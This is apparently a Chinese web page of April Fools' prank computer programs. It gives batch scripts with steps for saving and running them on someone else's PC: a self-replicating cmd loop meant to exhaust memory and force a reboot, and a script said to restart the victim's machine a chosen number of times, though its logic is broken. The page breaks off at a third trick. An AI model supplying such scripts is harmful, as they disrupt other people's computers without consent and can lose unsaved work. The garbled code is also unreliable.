2024年4月27日发(作者:)

愚人节整人电脑程序

【篇一:愚人节捉弄人小程序】

第一个:让别人内存over(逼他重启)

@echo off

start cmd

%0

就这3行了

打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你

想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理

器就完成了。

第二个:让对方重启指定次数(害人专用)

@echo off

if not exist c: echo. c: goto err1

if not exist c: echo. c: goto err1

if not exist c: echo. c: goto err1

if not exist c: echo. c: goto err1

if not exist c: echo. c: goto err1

goto err2

:err1

shutdown -s -t 0

:err2

上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:

echo. c: goto err1那就是重启6次

改成7就是7次...

打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你

想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理

器就完成了。

第三个:善意恶搞关机

首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具t-文件夹选项o-查看